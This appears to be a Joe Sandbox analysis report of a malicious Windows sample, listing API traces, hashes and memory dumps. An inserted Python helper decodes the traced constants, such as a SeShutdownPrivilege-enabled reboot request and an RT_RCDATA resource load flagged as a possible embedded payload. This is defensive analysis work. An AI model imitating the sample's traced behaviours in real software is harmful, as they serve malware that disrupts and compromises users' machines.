                                                                                                                                                                                                                                  • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                                                                                                                                                  • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                  • Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                                                                                                                                                                  • Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                                                  • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                                                                                                                                                  • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                                                                                  • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                                                                                                                                                  • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
• Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
• Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
• Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(00000028), ref: 00409457
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
• GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
• ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 107509674-3733053543
• Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
• Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
• Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
• Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
• SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
• LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
• LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
• Instruction ID: 5c2a5118689e511edc0a9dde7e1b9e77d0383d271af581b44440e1e73e890ea9
• Opcode Fuzzy Hash: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
• Instruction Fuzzy Hash: B0E07E80B8874726FA6576FB08C7B6B008C4BA570EF00003BB700792C3DDBC8C04462E
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
• Instruction ID: 1db3d1c1bb6fab5f91442dea8a08a829cd161d84d3a7e1f0c2fe21aaaafd944f
• Opcode Fuzzy Hash: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
• Instruction Fuzzy Hash: 9ED02EA230E2006AE210808B2C84EBB4A9CCEC53A0F00007FF648C3242D2208C029B76
Uniqueness
Uniqueness Score: -1.00%

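As an added example for the three function entries above (the SeShutdownPrivilege sequence, the FindResourceA/LoadResource lookup and the GetLocaleInfoA call), and not part of the Joe Sandbox report or of the sample's own code: a Python helper that parses the report's "APIs" lines and names the Win32 constants behind the raw hex arguments. The line pattern is inferred from the lines shown in this report; the constant values come from the Windows SDK headers; REPORT_LINES is copied from the entries above. Joe Sandbox's argument columns are heuristic stack reads, so only the leading arguments, whose meaning is fixed by the documented prototypes, are decoded.

```python
"""Decode the Win32 constants in Joe Sandbox "APIs" lines.

Added example for this report; not Joe Sandbox code and not code from the
analyzed sample. Parses lines of the form "Name.MODULE(arg,arg,...), ref: addr"
(format inferred from this report) and names the constants the raw hex
arguments stand for, using values from the Windows SDK headers. Only the
leading, prototype-defined arguments are interpreted because the sandbox's
argument columns are heuristic stack reads.
"""
import re

# "• Name.MODULE(arg1,arg2,...), ref: 0040949D" (bullet optional)
API_LINE = re.compile(r"^(?:•\s*)?(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")

# Windows SDK values (winnt.h, winuser.h, winnls.h)
TOKEN_ACCESS = {
    0x0001: "TOKEN_ASSIGN_PRIMARY", 0x0002: "TOKEN_DUPLICATE",
    0x0004: "TOKEN_IMPERSONATE", 0x0008: "TOKEN_QUERY",
    0x0010: "TOKEN_QUERY_SOURCE", 0x0020: "TOKEN_ADJUST_PRIVILEGES",
    0x0040: "TOKEN_ADJUST_GROUPS", 0x0080: "TOKEN_ADJUST_DEFAULT",
    0x0100: "TOKEN_ADJUST_SESSIONID",
}
EWX_FLAGS = {  # uFlags == 0 is EWX_LOGOFF
    0x0001: "EWX_SHUTDOWN", 0x0002: "EWX_REBOOT", 0x0004: "EWX_FORCE",
    0x0008: "EWX_POWEROFF", 0x0010: "EWX_FORCEIFHUNG",
}
RESOURCE_TYPES = {
    1: "RT_CURSOR", 2: "RT_BITMAP", 3: "RT_ICON", 4: "RT_MENU", 5: "RT_DIALOG",
    6: "RT_STRING", 7: "RT_FONTDIR", 8: "RT_FONT", 9: "RT_ACCELERATOR",
    10: "RT_RCDATA", 11: "RT_MESSAGETABLE", 12: "RT_GROUP_CURSOR",
    14: "RT_GROUP_ICON", 16: "RT_VERSION", 24: "RT_MANIFEST",
}
LCTYPES = {
    0x0001: "LOCALE_ILANGUAGE", 0x0002: "LOCALE_SLANGUAGE", 0x0005: "LOCALE_ICOUNTRY",
    0x0006: "LOCALE_SCOUNTRY", 0x000E: "LOCALE_SDECIMAL", 0x000F: "LOCALE_STHOUSAND",
    0x0010: "LOCALE_SGROUPING", 0x0011: "LOCALE_IDIGITS",
}


def parse_api_line(line):
    """Return {"api", "module", "args", "ref"}, or None if the line is not an API entry."""
    m = API_LINE.match(line.strip())
    if not m:
        return None
    name, module, raw_args, ref = m.groups()
    args = []
    for a in (raw_args.split(",") if raw_args else []):
        a = a.strip()
        if a == "?":
            args.append(None)                 # value unknown to the sandbox
        elif re.fullmatch(r"[0-9A-Fa-f]{8}", a):
            args.append(int(a, 16))           # 32-bit stack slot printed as hex
        else:
            args.append(a)                    # literal, e.g. SeShutdownPrivilege
    return {"api": name, "module": module, "args": args, "ref": int(ref, 16)}


def decode_flags(value, table, zero_name="0"):
    """Render a bitmask as 'A | B'; leftover bits not in the table are kept as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(hex(leftover))
    return " | ".join(names) if names else zero_name


def _is_int_id(v):
    # MAKEINTRESOURCE: a name/type with a zero high word is an integer ID, not a pointer
    return isinstance(v, int) and v < 0x10000


def annotate(call):
    """Map argument names of a few calls to decoded constant names."""
    api, args = call["api"], call["args"]
    notes = {}
    if api == "OpenProcessToken" and len(args) > 1 and isinstance(args[1], int):
        notes["DesiredAccess"] = decode_flags(args[1], TOKEN_ACCESS)
    elif api == "ExitWindowsEx" and args and isinstance(args[0], int):
        notes["uFlags"] = decode_flags(args[0], EWX_FLAGS, zero_name="EWX_LOGOFF")
    elif api in ("FindResourceA", "FindResourceW") and len(args) > 2:
        if _is_int_id(args[1]):
            notes["lpName"] = f"MAKEINTRESOURCE({args[1]})"
        if _is_int_id(args[2]):
            notes["lpType"] = RESOURCE_TYPES.get(args[2], f"MAKEINTRESOURCE({args[2]})")
    elif api in ("GetLocaleInfoA", "GetLocaleInfoW") and len(args) > 1 and isinstance(args[1], int):
        notes["LCType"] = LCTYPES.get(args[1], hex(args[1]))
    elif api in ("LookupPrivilegeValueA", "LookupPrivilegeValueW") and len(args) > 1:
        notes["lpName"] = args[1]
    return notes


def summarize(report_text):
    """Return [(api, ref, notes)] for every API line in the text, in report order."""
    calls = [parse_api_line(line) for line in report_text.splitlines()]
    return [(c["api"], c["ref"], annotate(c)) for c in calls if c]


# Copied from the function entries of this report (not constructed).
REPORT_LINES = """\
• GetCurrentProcess.KERNEL32(00000028), ref: 00409457
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
• GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
• ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
• FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
• GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
"""

if __name__ == "__main__":
    for api, ref, notes in summarize(REPORT_LINES):
        print(f"{ref:08X} {api:<24} {notes}")
```

Run stand-alone it prints one line per call. On these entries it shows that the first function opens its own token with TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, enables SeShutdownPrivilege and calls ExitWindowsEx with uFlags EWX_REBOOT and no EWX_FORCE, i.e. a reboot request that applications may still block; the second function fetches resource 11111 of type RT_RCDATA, a common place for an embedded payload, which should be dumped and inspected rather than assumed; and the locale call asks for LOCALE_STHOUSAND, the thousands separator, which on its own is numeric-format initialization rather than a country check, so the "may stop execution after checking locale" signature needs corroboration from the surrounding code before it is treated as geofencing.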
APIs
• GetSystemTime.KERNEL32(?), ref: 004026CE
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: SystemTime
• String ID:
• API String ID: 2656138-0
• Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
• Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
• Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
• Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,0040A622), ref: 00405D02
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
• Opcode ID: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
• Instruction ID: 4c33b40dd65743d8d98a5ffd827b1eb297e5dd4f71424004bfe2d5ab9b26ea54
• Opcode Fuzzy Hash: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
• Instruction Fuzzy Hash: 00C0126040070186D7109B31DC02B1672D4AB44310F4405396DA4963C2E73C80018A6E
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
• Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressCloseHandleModuleProc
                                                                                                                                                                                                                                  • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 4190037839-2401316094
                                                                                                                                                                                                                                  • Opcode ID: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                                                                                                                                                                  • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                                                                                                                                                                  • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                                                                                                                                                                  • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1694776339-0
                                                                                                                                                                                                                                  • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                                                                                                                                                  • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
                                                                                                                                                                                                                                    • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                                                                                                                                                    • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoLocale$DefaultSystem
                                                                                                                                                                                                                                  • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                                                                                                                                                  • API String ID: 1044490935-665933166
                                                                                                                                                                                                                                  • Opcode ID: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                                                                                                                                                                  • Instruction ID: cc137df54ae1fcbb63b87987e69a719e9c27c4b31815d0debc5c9b1d2781c89a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
